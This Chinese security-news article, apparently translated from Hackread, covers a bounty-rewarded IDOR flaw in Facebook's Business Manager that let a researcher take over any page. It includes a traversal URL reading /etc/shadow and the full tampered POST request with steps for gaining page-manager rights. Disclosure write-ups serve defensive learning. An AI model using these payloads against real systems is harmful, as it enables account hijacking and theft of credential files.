猫头鹰
信安舆情早知道

价值1w6美刀的Facebook页面接管漏洞

facebook-hacked

Facebook漏洞属于不安全对象引用

这个漏洞源于不安全的直接对象引用(IDOR)。IDOR的意思是,在引用内部实现对象(如文件或数据库密钥)时,该引用过程未经任何访问控制,对用户完全可见。这样,攻击者便可操控此等引用,非法访问非授权数据。就脸书而言,其业务管理平台中的IDOR漏洞可允许攻击者在不到10秒钟的时间内入侵任何脸书页面。

实际上,业务管理平台允许企业分享脸书中注册的广告账户、主页以及其他资产,并对其进行访问控制。任何人在登录企业页面后,都可以在一个地方看到所有现有的主页及广告账户,而无需分享登录信息或与脸书上的同事连接。
Sureshkumar同时指出,攻击者可黑入比尔·盖茨、纳伦德拉·莫迪、巴拉克·奥巴马等人的主页,肆意进行破坏,包括删除这些主页。

不安全直接对象引用是什么

所谓“不安全的对象直接引用”,即Insecure direct object references,意指一个已经授权的用户,通过更改访问时的一个参数,从而访问到了原本其并没有得到授权的对象。Web应用往往在生成Web页面时会用它的真实名字,且并不会对所有的目标对象访问时来检查用户权限,所以这就造成了不安全的对象直接引用的漏洞。
不安全的直接对象引用时,Web 应用程序公开给用户内部实现对象。内部实现对象的一些例子是数据库记录、 Url 或文件。攻击者可以修改内部实现对象中企图滥用此对象上的访问控制。当攻击者这样做他们可能有能力访问开发人员不希望公开访问的功能。

举个例子

不安全的直接对象引用是很多种类别的漏洞。有许多例子这些类型的由其他名字在野外发现的漏洞。开放重定向和目录遍历是不安全的直接对象引用漏洞的两个典型的例子。

开放重定向

这是在 Web 应用程序有一个参数,允许其他地方的用户重定向到网站。如果此参数不实现正确使用白名单,攻击者可使用这一网络钓鱼攻击引诱到他们选择的站点的潜在受害者。

目录遍历

假设 Web 应用程序允许为要呈现给用户存储在本地计算机上的文件。如果应用程序不验证应访问哪些文件,攻击者可以请求其他文件系统上的文件和那些也会显示。

例如,如果攻击者通知 URL:

https://oneasp.com/file.jsp?file=report.txt

攻击者可以修改文件参数使用目录遍历攻击。他修改的 URL:

https://oneasp.com/file.jsp?file=../../../etc/shadow

这样 /etc/阴影文件返回并且呈现由 file.jsp 演示页面容易受到目录遍历攻击。

Facebook漏洞细节

Sureshkumar在脸书上创建了两个企业账户,一个作为自己的账户,另一个用于测试。接下来,他使用自己的ID添加了一名合作伙伴,并通过Burp Suite截获该请求。之后,他用机构ID修改了上级企业ID,用欲黑入的页面ID修改了资产ID。在完成这些修改后,他请求启用页面上的管理员角色。

hacker-shows-how-to-hack-any-facebook-page-earns-16k-as-bug-bounty-768x336

漏洞验证

下面是该漏洞的验证过程,

  • 1.Facebook企业帐户(2个)

一个是自己的企业账户,另外一个可以是任何一个企业账户。

在这里,我使用的是我的企业账户,id是:907970555981524

另一个,我选择了我的测试账户,id是:991079870975788

  • 2.用我的企业账户添加一个合作伙伴,然后拦截请求

现在你可以看到这个含有漏洞的请求:

POST /business_share/asset_to_agency/?dpr=2 HTTP/1.1

Host: business.facebook.com

Connection: close

Content-Length: 436

Origin: https://business.facebook.com

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36

Content-Type: application/x-www-form-urlencoded

Accept: */*

Referer: https://business.facebook.com/settings/pages/536195393199075?business_id=907970555981524

Accept-Encoding: gzip, deflate, br

Accept-Language: en-US,en;q=0.8

Cookie: rc=2; datr=AWE3V–DUGNTOAy0wTGmpAXb; locale=en_GB; sb=BWE3V1vCnlxJF87yY9a8WWjP; pl=n; lu=gh2GPBnmZY1B1j_7J0Zi3nAA; c_user=100000771680694; xs=25%3A5C6rNSCaCX92MA%3A2%3A1472402327%3A4837; fr=05UM8RW0tTkDVgbSW.AWUB4pn0DvP1fQoqywWeORlj_LE.BXN2EF.IL.FfD.0.0.BXxBSo.AWXdKm2I; csm=2; s=Aa50vjfSfyFHHmC1.BXwxOY; _ga=GA1.2.1773948073.1464668667; p=-2; presence=EDvF3EtimeF1472469215EuserFA21B00771680694A2EstateFDutF1472469215051CEchFDp_5f1B00771680694F7CC; act=1472469233458%2F6

parent_business_id=907970555981524&agency_id=991079870975788&asset_id=536195393199075&role=MANAGER&__user=100000771680694&__a=1&__dyn=aKU-XxaAcoaucCJDzopz8aWKFbGEW8UhrWqw-xG2G4aK2i8zFE8oqCwkoSEvmbgcFV8SmqVUzxeUW4ohAxWdwSDBzovU-eBCy8b48xicx2aGewzwEx2qEN4yECcKbBy9onwFwHCBxungXKdAw&__req=e&__be=-1&__pc=PHASED%3Abrands_pkg&fb_dtsg=AQHoLGh1HUmf%3AAQGT4fDF1-nQ&ttstamp=265817211176711044972851091025865817184521026870494511081&__rev=2530733
  • 3.修改asset id为你想要破解的页面id。同时交换parent_business_id和agency_id的值
parent_business_id= 991079870975788

agency_id= 907970555981524

asset_id =190313461381022

role= MANAGER
  • 4.重新发送请求

请求发送成功,Facebook页面添加到了攻击者的商业管理平台,并且权限角色是管理者。

  • 5.该利用将我的账户添加为了页面的管理者
  • 6.使用Facebook的商业管理平台浏览页面,我可以做任何我想做的事了!

短短几秒之后,Sureshkumar获取了目标页面的管理员权限,这样便可以通过业务管理平台执行任何操作。
下面的视频再现了Sureshkumar秒黑脸书页面的全过程:

影响

利用该漏洞可以接管任何Facebook页面(例如:比尔·盖茨,巴拉克奥巴马(Barack Obama)的页面),并且可以做任何操作,包括关键页面的删除修改等操作。

 

*原文:hackread  Mottoin翻译发布

转载请注明来自MottoIN,未经允许不得转载!MottoIN » 价值1w6美刀的Facebook页面接管漏洞

分享到:更多 ()

评论 抢沙发

评论前必须登录!

 

MottoIN 换一个角度看安全

寻求报道联系我们